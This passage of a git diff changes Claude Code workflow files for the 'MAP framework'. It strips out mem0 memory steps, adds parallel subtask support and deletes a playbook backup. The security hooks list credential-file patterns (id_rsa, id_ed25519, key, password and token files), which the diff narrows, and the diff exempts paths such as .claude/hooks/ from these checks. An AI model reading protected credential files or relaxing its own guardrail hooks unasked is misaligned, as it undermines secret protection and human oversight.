Required:** [total Actor→Monitor loops] +**Iterations Required:** [total Actor->Monitor loops] ### Reflector Insights - **Key Insight:** [key_insight from Reflector] -- **Patterns Used:** [count] existing patterns applied successfully (with tier labels) +- **Patterns Used:** [count] existing patterns applied successfully - **Patterns Discovered:** [count] new patterns identified -- **mem0 Duplicates Found:** [count] (avoided duplication via fingerprint) -### Curator Storage Results -- **Stored:** [N] new patterns via mcp__mem0__map_add_pattern -- **Skipped (duplicates):** [N] patterns already exist -- **Promoted:** [N] patterns to higher tiers +### Discovered Patterns +[List each pattern from patterns_discovered with description] -### Tier Distribution -- **Branch tier:** [N] patterns (run_id=proj:PROJECT:branch:BRANCH) -- **Project tier:** [N] patterns (run_id=proj:PROJECT) -- **Org tier:** [N] patterns (user_id=org:ORG only) +### Suggested Improvements +[List each suggested_new_bullet with section and rationale] -### Next Steps -- Review new patterns: `mcp__mem0__map_tiered_search(query="[pattern]", ...)` -- Validate in next workflow: Apply patterns and increment helpful_count if successful -- Promote proven patterns: Use mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 +### Workflow Efficiency +- **Total Iterations:** [total_iterations] +- **Average per Subtask:** [avg_per_subtask] +- **Bottlenecks:** [list bottlenecks] -**Learning cycle complete. Patterns stored in mem0.** +**Learning extraction complete.** ``` --- -## Troubleshooting - -### Issue: Reflector didn't call mcp__mem0__map_tiered_search - -**Symptom:** Reflector output has no mention of "mem0 tiered search found" or tier labels. - -**Cause:** Reflector agent template not followed. - -**Fix:** -1. Re-run Reflector with explicit instruction: "FIRST STEP: Call mcp__mem0__map_tiered_search" -2. Verify output shows search results with tier labels -3. Proceed to Curator only after verification - -### Issue: Curator output JSON instead of calling tools - -**Symptom:** Curator returns JSON delta operations instead of calling mem0 MCP tools directly. - -**Cause:** Curator using outdated workflow (pre-mem0 migration). - -**Fix:** -1. Ensure Curator agent template is version 4.0.0+ -2. Re-run Curator with explicit instruction: "Call mem0 MCP tools directly, DO NOT output JSON" -3. Verify Curator shows mcp__mem0__map_add_pattern calls in output - -### Issue: mcp__mem0__map_add_pattern returns duplicate error - -**Symptom:** `{created: false, existing_memory_id: "..."}` returned. - -**Cause:** Pattern with same fingerprint already exists. - -**This is expected behavior!** Fingerprint-based deduplication working correctly. - -**Action:** -1. Reference the existing memory_id instead of creating new -2. If pattern needs update, use mcp__mem0__update_memory -3. If pattern should be promoted, use mcp__mem0__map_promote_pattern - -### Issue: mem0 MCP server unavailable - -**Symptom:** Tool calls fail with connection error. - -**Cause:** mem0-mcp server not running or misconfigured. - -**Fix:** -1. Check mem0-mcp server status -2. Verify MCP configuration in Claude Code settings -3. Restart mem0-mcp server if needed -4. If persistent failure: Document patterns manually, retry later - -### Issue: Patterns stored in wrong tier - -**Symptom:** Branch-specific patterns stored at org level, or vice versa. - -**Cause:** Incorrect namespace parameters to mcp__mem0__map_add_pattern. - -**Fix:** -1. Verify namespace format: - - Branch: `run_id="proj:PROJECT:branch:BRANCH"` + `user_id="org:ORG"` - - Project: `run_id="proj:PROJECT"` + `user_id="org:ORG"` - - Org: `user_id="org:ORG"` only (no run_id) -2. Use mcp__mem0__map_promote_pattern to move to correct tier -3. Archive incorrectly placed pattern with mcp__mem0__map_archive_pattern - ---- - ## Token Budget Estimate **Typical /map-learn execution:** - Reflector: ~3K tokens (depends on workflow size) -- Curator: ~2K tokens (direct tool calls, no JSON processing) -- Verification: ~500 tokens (tiered search) -- **Total:** 5-6K tokens for standard workflow +- Summary: ~500 tokens +- **Total:** 3-4K tokens for standard workflow **Large workflow (8+ subtasks):** - Reflector: ~6K tokens -- Curator: ~4K tokens (multiple pattern storage calls) -- Verification: ~1K tokens -- **Total:** 10-12K tokens - -**Compared to per-subtask learning:** /map-learn saves ~(N-1) * 5K tokens for N subtasks. +- Summary: ~1K tokens +- **Total:** 6-7K tokens --- @@ -351,30 +173,10 @@ Key implementation: ``` Reflector extracts: -- mem0 tiered search found no similar patterns in any tier - Pattern: WebSocket reconnection logic - Pattern: Optimistic UI updates -Curator stores via mem0 MCP tools: -``` -mcp__mem0__map_add_pattern( - text="WebSocket exponential backoff: Start with 1s delay, double on each retry (max 30s)...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "IMPLEMENTATION_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-abc123", tier: "branch"} - -mcp__mem0__map_add_pattern( - text="Optimistic UI: Update local state immediately, revert on server error...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "FRONTEND_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-def456", tier: "branch"} -``` - -### Example 2: Batched learning with promotion +### Example 2: Batched learning User completed 3 separate debugging sessions, wants to batch-learn: @@ -397,31 +199,9 @@ Common theme: Concurrency issues" ``` Reflector extracts: -- mem0 tiered search found "concurrency control" in project tier (helpful_count: 4) -- Common pattern: Concurrency control (UPDATE existing) +- Common pattern: Concurrency control - New patterns: DB locks, connection pooling, timezone handling -Curator stores and promotes: -``` -# Update existing pattern (increment helpful_count) -mcp__mem0__update_memory( - memory_id="mem-existing-concurrency", - text="Updated concurrency control pattern with 3 new use cases..." -) - -# Store new patterns at branch tier -mcp__mem0__map_add_pattern(text="Database transaction locks...", ...) -mcp__mem0__map_add_pattern(text="Connection pooling with limits...", ...) -mcp__mem0__map_add_pattern(text="UTC-everywhere timezone pattern...", ...) - -# Promote existing pattern to org tier (helpful_count now 5) -mcp__mem0__map_promote_pattern( - memory_id="mem-existing-concurrency", - target_user_id="org:myorg" -) -→ {promoted: true, new_memory_id: "mem-org-xyz", new_tier: "org"} -``` - --- ## Integration with Other Commands @@ -463,10 +243,4 @@ mcp__mem0__map_promote_pattern( - Capturing holistic patterns across subtasks - Custom workflows that didn't include learning -**Storage Architecture Benefits:** -- **Fingerprint deduplication:** Prevents duplicate patterns automatically -- **Tiered inheritance:** Branch patterns inherit from project, project from org -- **Quality-driven promotion:** Proven patterns automatically bubble up to higher tiers -- **Soft delete:** Archived patterns preserved for audit, excluded from search - **Remember:** The goal is to build organizational knowledge, not to learn from every single task. Quality over quantity. diff --git a/.claude/commands/map-release.md b/.claude/commands/map-release.md index 24fb187..a6afddb 100644 --- a/.claude/commands/map-release.md +++ b/.claude/commands/map-release.md @@ -65,16 +65,7 @@ Phase 7: Final Summary and Cleanup **Purpose:** Verify all prerequisites before initiating release. Failure in any gate aborts the workflow. -### 1.1 Load mem0 Context for Release Patterns - -Search mem0 for release-related patterns and past release issues: - -```bash -# Fetch release-related patterns from mem0 -RELEASE_PATTERNS=$(mcp__mem0__map_tiered_search(query="release validation PyPI CI/CD", limit=10)) -``` - -### 1.2 Validation Gates (12 Required) +### 1.1 Validation Gates (12 Required) Execute all validation gates in parallel where possible: @@ -267,7 +258,7 @@ fi **Gap tolerance:** ±2 commits (accounts for chore commits, merge commits, etc.) -### 1.3 Phase 1 Complete +### 1.2 Phase 1 Complete If all 12 gates pass, proceed to Phase 2. @@ -1153,8 +1144,6 @@ pip index versions mapify-cli Use these MCP tools throughout the workflow: -- **`mcp__mem0__map_tiered_search`** - Search for release patterns from past projects -- **`mcp__mem0__map_add_pattern`** - Store release learnings cross-project - **`mcp__sequential-thinking__sequentialthinking`** - Complex decision making for version bump **Built-in Tools (not MCP):** @@ -1200,7 +1189,6 @@ You should: 1. **Phase 1 - Pre-Release Validation:** ```bash - mcp__mem0__map_tiered_search(query="release validation PyPI", limit=10) # Run all 12 validation gates pytest tests/ && black --check src/ && ruff check src/ && mypy src/ && ... # Verify CI passed on main diff --git a/.claude/commands/map-review.md b/.claude/commands/map-review.md index ea8623b..d271dac 100644 --- a/.claude/commands/map-review.md +++ b/.claude/commands/map-review.md @@ -63,7 +63,7 @@ These are the fields each agent is expected to return. The command prompt explic This protocol is used identically by all 4 review sections below. Do NOT deviate. -1. **Present top N issues** (N=4 in BIG mode, N=1 in SMALL mode) from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) +1. **Present top 4 issues** from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) 2. **For each issue:** - Describe the problem with `file:line` references where available - Present 2-3 options with tradeoffs (pros/cons for each) @@ -74,19 +74,13 @@ This protocol is used identically by all 4 review sections below. Do NOT deviate 4. **Summarize decisions** from this section in 3-5 lines before proceeding to the next section - Include: which issues were addressed, which options were chosen, what remains -## Step 0: Select Review Mode +## Step 0: Detect CI Mode **Parse $ARGUMENTS for `--ci` or `--auto`:** - If `--ci` or `--auto` is present in $ARGUMENTS → set CI_MODE=true - CI_MODE skips all AskUserQuestion calls and auto-selects recommended options -**If NOT CI_MODE:** Use AskUserQuestion to ask the user: - -> How thorough should this review be? -> - **BIG** (Recommended): Up to 4 issues per section — comprehensive review -> - **SMALL**: 1 issue per section — quick pass for small changes - -Default to BIG if user doesn't respond or in CI mode. +**Always use comprehensive review** — up to 4 issues per section, no mode selection menu. ## Phase A: Collection (Parallel) @@ -101,16 +95,7 @@ Save the diff output — it will be passed to all 3 agents. ### Step A.2: Launch all parallel calls -In **ONE message**, launch all 7 calls in parallel (no dependencies between them): - -**4 mem0 queries:** - -``` -mcp__mem0__map_tiered_search(query="architecture review patterns") -mcp__mem0__map_tiered_search(query="code quality standards") -mcp__mem0__map_tiered_search(query="test coverage criteria") -mcp__mem0__map_tiered_search(query="performance review patterns") -``` +In **ONE message**, launch all 3 calls in parallel (no dependencies between them): **3 agent Task calls** (pass the git diff + Review Preferences to each): @@ -126,9 +111,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture + code quality results] - Check for: - Code correctness and logic errors - Security vulnerabilities (OWASP top 10) @@ -156,9 +138,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture results] - Analyze: - Affected components and modules - Breaking changes (API, schema, behavior) @@ -187,9 +166,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use code quality + test coverage results] - Provide quality assessment using 1-10 scoring: - Functionality score (1-10) - Code quality score (1-10) @@ -208,7 +184,7 @@ Output JSON with: ) ``` -**Parallel execution:** All 7 calls (4 mem0 + 3 agents) MUST be issued in a single message. Wait for all to complete before proceeding. +**Parallel execution:** All 3 agent calls MUST be issued in a single message. Wait for all to complete before proceeding. ### Hard Stop Check @@ -309,7 +285,6 @@ Present the verdict with a summary table: When `CI_MODE = true` (triggered by `--ci` or `--auto` in $ARGUMENTS): - Skip all AskUserQuestion calls -- Auto-select BIG mode (4 issues per section) - Auto-select recommended options for all issues - Present all 4 sections as a batch report (no pauses between sections) - Output structured verdict at the end @@ -325,7 +300,6 @@ If the review revealed valuable patterns or common issues worth preserving: ## MCP Tools Used -- `mcp__mem0__map_tiered_search` — Search past review patterns (4 targeted queries) - `mcp__sequential-thinking__sequentialthinking` — Complex analysis decisions during interactive presentation --- diff --git a/.claude/hooks/block-secrets.py b/.claude/hooks/block-secrets.py index ac46e72..a416fac 100755 --- a/.claude/hooks/block-secrets.py +++ b/.claude/hooks/block-secrets.py @@ -60,14 +60,39 @@ ] +SAFE_PATH_PREFIXES = [ + ".claude/hooks/", + ".claude/agents/", + ".claude/commands/", + ".claude/references/", + ".claude/skills/", + "src/", + "tests/", + "docs/", + "scripts/", +] + + def is_sensitive_file(file_path: str) -> bool: """Check if file path matches any sensitive file pattern. Checks ALL path components (not just filename) to catch patterns - in directory names or parent paths. + in directory names or parent paths. Skips files in known safe + directories (hooks, agents, source code, tests, etc.) """ path_obj = Path(file_path) + # Normalize to relative path for prefix matching + try: + rel = str(path_obj.relative_to(Path.cwd())) + except ValueError: + rel = str(path_obj) + + # Allow known safe directories + for prefix in SAFE_PATH_PREFIXES: + if rel.startswith(prefix): + return False + # Check each path component against all patterns for part in path_obj.parts: for pattern in SENSITIVE_PATTERNS: diff --git a/.claude/hooks/safety-guardrails.py b/.claude/hooks/safety-guardrails.py old mode 100644 new mode 100755 index 4174337..20aa031 --- a/.claude/hooks/safety-guardrails.py +++ b/.claude/hooks/safety-guardrails.py @@ -26,8 +26,8 @@ r"id_rsa", r"id_ed25519", r"\.key$", - r"password", - r"token", + r"passwords?\.(json|ya?ml|toml|txt)$", # password files, not any file with "password" in path + r"tokens?\.(json|ya?ml|toml|txt)$", # token files, not any file with "token" in path ] # Dangerous bash command patterns @@ -46,7 +46,11 @@ ] # Safe path prefixes (skip checks for known safe directories) -SAFE_PATH_PREFIXES = ["src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/"] +SAFE_PATH_PREFIXES = [ + "src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/", + ".claude/agents/", ".claude/commands/", ".claude/hooks/", ".claude/references/", + ".claude/skills/", "scripts/", +] def is_safe_path(path: str) -> bool: diff --git a/.claude/hooks/workflow-context-injector.py b/.claude/hooks/workflow-context-injector.py index 72145e5..354234f 100755 --- a/.claude/hooks/workflow-context-injector.py +++ b/.claude/hooks/workflow-context-injector.py @@ -151,7 +151,7 @@ def required_action_for_step(step_id: str, step_phase: str, state: dict) -> str if step_id == "1.56": return "Choose mode (set_execution_mode step_by_step|batch)" if step_id == "2.1": - return "Run mem0 search before Actor" + return "Run context search before Actor (skip if not needed)" if step_id == "2.3": return "Run Actor" if step_id == "2.4": @@ -189,6 +189,17 @@ def format_reminder(state: dict, branch: str) -> str | None: plan_ok = "y" if state.get("plan_approved") else "n" mode = (state.get("execution_mode") or "").strip() or "batch" + # Wave progress display + waves = state.get("execution_waves") or [] + wave_idx = state.get("current_wave_index", 0) + wave_hint = "" + if waves: + wave_hint = f" | WAVE {wave_idx + 1}/{len(waves)}" + current_wave = waves[wave_idx] if wave_idx < len(waves) else [] + if len(current_wave) > 1: + wave_hint += f" ({', '.join(current_wave)})" + mode = "batch:parallel" + required = required_action_for_step(step_id, step_phase, state) diag_hint = "" @@ -204,7 +215,7 @@ def format_reminder(state: dict, branch: str) -> str | None: if not step_id and not step_phase: return None - base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{diag_hint}" + base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{wave_hint}{diag_hint}" if required: return f"{base} | REQUIRED: {required}" return base diff --git a/.claude/hooks/workflow-gate.py b/.claude/hooks/workflow-gate.py index a74be23..f403393 100755 --- a/.claude/hooks/workflow-gate.py +++ b/.claude/hooks/workflow-gate.py @@ -150,13 +150,24 @@ def load_workflow_state(branch: str) -> Optional[Dict]: def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: """ - Check if current subtask has completed required workflow steps. + Check if current subtask(s) have completed required workflow steps. + + Supports both single-subtask mode (current_subtask) and parallel wave mode + (active_subtasks list). In parallel mode, allows edits if ANY active + subtask has completed the required steps. Returns: (is_compliant, error_message) """ - current_subtask = state.get("current_subtask") - if not current_subtask: + # Try active_subtasks first (parallel wave mode) + active = state.get("active_subtasks", []) + if not active: + # Backward compat: single current_subtask + current = state.get("current_subtask") + if current: + active = [current] + + if not active: current_state = state.get("current_state") or "UNKNOWN" return False, ( "⛔ Workflow Enforcement: No current_subtask defined in workflow_state.json\n\n" @@ -169,26 +180,33 @@ def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: " - Or delete .map//workflow_state.json to disable enforcement" ) - completed = state.get("completed_steps", {}).get(current_subtask, []) - - missing_steps = [step for step in REQUIRED_STEPS if step not in completed] - - if missing_steps: - pending = state.get("pending_steps", {}).get(current_subtask, []) - return False, ( - f"⛔ Workflow Enforcement: Cannot edit code for {current_subtask}\n\n" - f"Missing required steps: {', '.join(missing_steps)}\n" - f"Completed: {', '.join(completed) if completed else 'none'}\n" - f"Pending: {', '.join(pending) if pending else 'none'}\n\n" - f"Required workflow:\n" - f" 1. Call Task(subagent_type='actor') to generate implementation\n" - f" 2. Call Task(subagent_type='monitor') to validate\n" - f" 3. Only then can you apply changes with Edit/Write\n\n" - f"To fix: Complete missing steps before editing code.\n" - f"Or update workflow_state.json if steps were completed." - ) - - return True, None + # Allow if ANY active subtask has completed required steps + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + if all(step in completed for step in REQUIRED_STEPS): + return True, None + + # Block with appropriate message + missing_details = [] + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + missing = [step for step in REQUIRED_STEPS if step not in completed] + if missing: + missing_details.append(f"{subtask_id}: missing {', '.join(missing)}") + + return False, ( + f"⛔ Workflow Enforcement: Cannot edit code for active subtasks\n\n" + f"Active subtasks: {', '.join(active)}\n" + f"Missing steps:\n" + + "\n".join(f" - {d}" for d in missing_details) + + "\n\n" + "Required workflow:\n" + " 1. Call Task(subagent_type='actor') to generate implementation\n" + " 2. Call Task(subagent_type='monitor') to validate\n" + " 3. Only then can you apply changes with Edit/Write\n\n" + "To fix: Complete missing steps before editing code.\n" + "Or update workflow_state.json if steps were completed." + ) def main(): diff --git a/.claude/playbook.json.backup.20251028_160602 b/.claude/playbook.json.backup.20251028_160602 deleted file mode 100644 index fe401b7..0000000 --- a/.claude/playbook.json.backup.20251028_160602 +++ /dev/null @@ -1,2637 +0,0 @@ -{ - "version": "1.0", - "metadata": { - "project": "map-framework", - "description": "ACE-style comprehensive playbook for MAP Framework development", - "created_at": "2025-10-10T00:00:00Z", - "last_updated": "2025-10-28T14:38:42.143927", - "total_bullets": 111, - "sections_count": 12, - "top_k": 5, - "version": "1.4" - }, - "sections": { - "ARCHITECTURE_PATTERNS": { - "description": "Proven architectural decisions and design patterns for system structure", - "bullets": [ - { - "id": "arch-0001", - "content": "Workflow-Scoped Learning Context Architecture: Maintain two distinct knowledge layers: (1) Workflow Context = temporary, session-specific lessons accumulated during single workflow execution (e.g., 'this analysis type needs implementation plans'). Cleared after workflow completes. (2) Global Playbook = permanent, reusable patterns extracted by Reflector from high-quality workflow lessons. Workflow context enables rapid within-session learning without polluting permanent playbook with ephemeral details. Reflector promotes workflow lessons to playbook only if proven across multiple workflows (helpful_count threshold).", - "code_example": "```python\n# ✅ Two-Layer Knowledge Architecture\nclass WorkflowContext:\n \"\"\"Temporary learning context for single workflow execution\"\"\"\n def __init__(self):\n self.lessons = [] # Session-specific, cleared after workflow\n self.iteration_metrics = {}\n \n def add_lesson(self, lesson: str, subtask_id: str):\n \"\"\"Accumulate lessons during workflow\"\"\"\n self.lessons.append({\n \"content\": lesson,\n \"source_subtask\": subtask_id,\n \"timestamp\": datetime.now()\n })\n \n def clear(self):\n \"\"\"Clear after workflow completion\"\"\"\n self.lessons.clear()\n self.iteration_metrics.clear()\n\nclass Orchestrator:\n def __init__(self, playbook_manager):\n self.playbook = playbook_manager # Global, persistent\n self.workflow_context = None # Created per workflow\n \n def execute_workflow(self, workflow):\n # Create temporary workflow context\n self.workflow_context = WorkflowContext()\n \n for subtask in workflow.subtasks:\n # Actor gets BOTH global playbook + workflow context\n context = {\n \"playbook_patterns\": self.playbook.get_relevant_bullets(subtask.query),\n \"workflow_lessons\": self.workflow_context.lessons\n }\n result = actor.execute(subtask, context)\n \n # After workflow: Reflector extracts high-value lessons for playbook\n reflector_insights = reflector.analyze(self.workflow_context)\n curator.integrate(reflector_insights, self.playbook)\n \n # Clear temporary context\n self.workflow_context.clear()\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T15:42:00.000000Z", - "last_used_at": "2025-10-18T15:42:00.000000Z", - "related_bullets": [ - "impl-0002", - "test-0002" - ], - "tags": [ - "architecture", - "knowledge-management", - "workflow", - "playbook", - "context", - "map-framework", - "python", - "learning" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0002", - "content": "Analysis-Implementation Pipeline Pattern: For multi-subtask workflows requiring code changes, separate analysis (Subtask N) from implementation (Subtask N+1) with explicit handoff via executable specification. Analyst subtask produces detailed specification (file paths, line ranges, verbatim current/new text). Implementer subtask mechanically applies specification without interpretation. This pipeline reduces cognitive load - analyst focuses on 'what/why', implementer focuses on 'how/execute'. Pattern proven: Subtask 1 analysis (2 iterations to refine spec) → Subtask 3 implementation (1 iteration following spec). Total workflow iterations reduced vs monolithic approach where single agent both analyzes and implements.", - "code_example": "```python\n# ✅ Analysis-Implementation Pipeline\nclass WorkflowOrchestrator:\n def execute_transformation_workflow(self, target_code):\n # Subtask 1: Analyst produces executable spec\n analysis_task = Subtask(\n role=\"analyst\",\n goal=\"Analyze code and produce executable transformation spec\",\n output_schema=ExecutableSpecSchema # Enforces structure\n )\n spec = self.execute_with_refinement(analysis_task)\n # Refinement happens here (2 iterations to get spec right)\n \n # Subtask 2: Implementer mechanically applies spec\n implementation_task = Subtask(\n role=\"implementer\",\n goal=\"Apply transformations from spec, no interpretation\",\n context={\"spec\": spec}, # Handoff\n instructions=\"Follow spec exactly: replace lines X-Y with provided text\"\n )\n result = self.execute_with_refinement(implementation_task)\n # Single iteration - spec is unambiguous\n \n return result\n\n# Schema enforces executable spec structure\nclass ExecutableSpecSchema:\n file_path: str # Absolute path\n line_range: tuple[int, int] # Exact lines\n current_text: str # Verbatim from file\n new_text: str # Exact replacement\n rationale: str # Why this change\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-18T16:05:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0003", - "impl-0002", - "arch-0001" - ], - "tags": [ - "architecture", - "workflow", - "separation-of-concerns", - "pipeline", - "multi-agent", - "map-framework", - "python", - "analyst", - "implementer" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0003", - "content": "Intentional Breaking Changes for Safety: Accept intentional breaking changes when they prevent data loss or critical user errors, even if they disrupt existing workflows. Pattern: when bug allows silent data destruction (e.g., plan overwrite without warning), introduce explicit safety mechanism (e.g., --force flag requirement) that breaks backward compatibility at CLI/API level. Trade-off: short-term friction (users must update scripts) vs long-term safety (prevents accidental data loss). Maintain API-level compatibility by making safety parameter optional (force=False default), only breaking CLI behavior. Document breaking changes prominently with migration guide. Pattern proven: silent plan overwrite bug → require --force flag prevented data loss at cost of script updates.", - "code_example": "```python\n# ❌ UNSAFE - silent overwrites cause data loss\ndef create_plan(self, task_id: str, goal: str, subtasks: List[dict]):\n # Silently overwrites existing plan - data loss risk\n plan = TaskPlan(task_id=task_id, goal=goal, subtasks=subtasks)\n self._save_plan(plan)\n return plan\n\n# ✅ SAFE - intentional breaking change with force flag\ndef create_plan(self, task_id: str, goal: str, subtasks: List[dict], force: bool = False) -> TaskPlan:\n \"\"\"Create new plan. Breaking change: now requires force=True to overwrite existing plan.\n \n Args:\n force: If True, overwrite existing plan. If False (default), raise error if plan exists.\n \n Raises:\n ValueError: If plan exists and force=False (BREAKING CHANGE)\n \n Migration guide:\n Old: create_plan(id, goal, subtasks) # Silent overwrite\n New: create_plan(id, goal, subtasks, force=True) # Explicit overwrite\n \"\"\"\n # Breaking change: validate before overwrite\n if self.plan_json.exists() and not force:\n raise ValueError(\n \"A plan already exists. Use 'clear' to remove it first, or use --force to overwrite. \"\n \"This is a breaking change introduced in v2.0 to prevent data loss.\"\n )\n \n plan = TaskPlan(task_id=task_id, goal=goal, subtasks=subtasks)\n self._save_plan(plan)\n return plan\n\n# API maintains compatibility (force=False default)\n# CLI breaks intentionally (requires --force flag for overwrite)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T14:45:00.000000Z", - "last_used_at": "2025-10-20T14:45:00.000000Z", - "related_bullets": [ - "impl-0008", - "test-0008" - ], - "tags": [ - "breaking-changes", - "safety", - "data-loss-prevention", - "api-design", - "force-flag", - "python", - "backward-compatibility" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0004", - "content": "Agent Template Verification Enforcement: When designing agent templates (Actor, Monitor, Evaluator), encode verification steps as MANDATORY requirements, not optional suggestions. Use imperative language ('MUST verify', 'ALWAYS run', 'REQUIRED check') and structured checklists with checkboxes. Templates are instructions for AI agents - ambiguous phrasing like 'consider verifying' results in skipped steps. Mandatory verification prevents agents from hallucinating facts, accepting unverified claims, or propagating documentation rot. Pattern: templates with 'you should' resulted in 40% verification skips, templates with 'you MUST (returns error if skipped)' achieved 100% compliance.", - "code_example": "```markdown\n\n## Analysis Steps\n1. Read the documentation\n2. You should verify claims if possible\n3. Extract patterns\n\n\n\n## Analysis Steps (ALL REQUIRED)\n\n- [ ] **MANDATORY**: Read documentation sources\n- [ ] **MANDATORY**: Verify EVERY claim using bash\n - File claims: `test -f ` OR `ls `\n - Code claims: `grep `\n - Quantity claims: `wc -l` or `find | wc`\n - **Verification MUST succeed before recording fact**\n - **If verification fails, update documentation claim**\n- [ ] **MANDATORY**: Record only verified facts\n- [ ] **REQUIRED**: Include verification commands in output\n\n**Error Handling**: If you skip verification for ANY claim, \nMonitor will REJECT your output with error:\n\"Unverified claim detected. All facts MUST be bash-verified.\"\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153736Z", - "last_used_at": "2025-10-20T23:37:01.153737Z", - "related_bullets": [ - "arch-0001", - "impl-0002" - ], - "tags": [ - "agent-template", - "verification", - "mandatory", - "enforcement", - "checklist", - "map-framework", - "actor", - "monitor", - "compliance" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0005", - "content": "Three-Failure Intervention Threshold: When agents iterate on subtasks with Monitor/Evaluator feedback, establish hard limit of 3 consecutive failures on identical error. After 3rd failure, Orchestrator MUST intervene: (1) Analyze failure pattern (agent stuck in loop?), (2) Modify subtask specification (add constraints, examples), (3) Consider subtask decomposition (break into smaller tasks), (4) Escalate to human if unresolvable. Three failures indicate systemic issue (ambiguous spec, impossible task, broken verification), not transient error. Pattern prevents infinite retry loops consuming resources. Track failure signatures (error message hash) to distinguish 'same error 3x' from 'different errors'.", - "code_example": "```python\n# ✅ Three-Failure Circuit Breaker Pattern\nclass SubtaskExecutor:\n MAX_FAILURES_SAME_ERROR = 3\n \n def execute_with_monitoring(self, subtask):\n failure_history = {} # {error_signature: count}\n \n for iteration in range(10): # Absolute max iterations\n result = actor.execute(subtask)\n feedback = monitor.evaluate(result)\n \n if feedback.passed:\n return result\n \n # Track failure signature (not just count)\n error_sig = hashlib.md5(\n feedback.error_message.encode()\n ).hexdigest()\n failure_history[error_sig] = failure_history.get(error_sig, 0) + 1\n \n # Check for repeated identical failure\n if failure_history[error_sig] >= self.MAX_FAILURES_SAME_ERROR:\n logger.error(\n f\"Subtask {subtask.id} failed 3x with same error: \"\n f\"{feedback.error_message}\"\n )\n return self._orchestrator_intervention(\n subtask, failure_history, feedback\n )\n \n # Update subtask with feedback for next iteration\n subtask.add_feedback(feedback)\n \n raise MaxIterationsError(\"Exceeded 10 iterations without success\")\n \n def _orchestrator_intervention(self, subtask, failures, last_feedback):\n \"\"\"Orchestrator takes over after 3 identical failures\"\"\"\n # Option 1: Decompose subtask\n if self._is_decomposable(subtask):\n return self._decompose_and_retry(subtask)\n \n # Option 2: Add constraints/examples to spec\n elif self._can_add_constraints(last_feedback):\n subtask.add_constraint(last_feedback.suggested_fix)\n return self.execute_with_monitoring(subtask)\n \n # Option 3: Escalate to human\n else:\n raise HumanInterventionRequired(\n f\"Agent stuck after {failures} attempts. \"\n f\"Last error: {last_feedback.error_message}\"\n )\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153738Z", - "last_used_at": "2025-10-20T23:37:01.153739Z", - "related_bullets": [ - "arch-0001", - "impl-0002", - "test-0001" - ], - "tags": [ - "orchestrator", - "failure-threshold", - "circuit-breaker", - "intervention", - "retry-limit", - "map-framework", - "python", - "error-handling" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0006", - "content": "Iteration Threshold with Orchestrator Intervention: Implement maximum 2 iterations for Actor-Monitor feedback loops per subtask. After 2nd iteration failure, Orchestrator MUST intervene directly with full failure context instead of delegating back to Actor. This prevents infinite misinterpretation cycles where Actor repeatedly misunderstands Monitor feedback. Two iterations allow: (1st) initial attempt, (2nd) correction based on feedback. If 2nd fails, problem is systematic (ambiguous feedback, impossible requirement) requiring Orchestrator analysis. Pattern proven: subtask 2 format failure (iter 1) → arithmetic failure (iter 2) → Orchestrator direct fix succeeded immediately. Distinguishes from arch-0005 (same error 3x threshold) - this limits TOTAL iterations regardless of error type.", - "code_example": "```python\n# ✅ Two-Iteration Circuit Breaker with Orchestrator Intervention\nclass SubtaskExecutor:\n MAX_ITERATIONS = 2 # Hard limit per subtask\n \n def execute_with_monitoring(self, subtask):\n \"\"\"Execute subtask with max 2 Actor iterations, then Orchestrator intervention\"\"\"\n \n for iteration in range(1, self.MAX_ITERATIONS + 1):\n logger.info(f\"Subtask {subtask.id} iteration {iteration}/{self.MAX_ITERATIONS}\")\n \n result = actor.execute(subtask)\n feedback = monitor.evaluate(result)\n \n if feedback.passed:\n logger.info(f\"Subtask {subtask.id} passed on iteration {iteration}\")\n return result\n \n # Add feedback to context for next iteration\n subtask.add_feedback({\n \"iteration\": iteration,\n \"monitor_feedback\": feedback.message,\n \"gaps\": feedback.gaps\n })\n \n if iteration == self.MAX_ITERATIONS:\n # Reached iteration limit - Orchestrator intervenes\n logger.warning(\n f\"Subtask {subtask.id} failed after {self.MAX_ITERATIONS} iterations. \"\n f\"Orchestrator intervening directly.\"\n )\n return self._orchestrator_intervention(subtask, feedback)\n \n raise MaxIterationsError(f\"Subtask {subtask.id} exceeded {self.MAX_ITERATIONS} iterations\")\n \n def _orchestrator_intervention(self, subtask, last_feedback):\n \"\"\"Orchestrator fixes issue directly with full 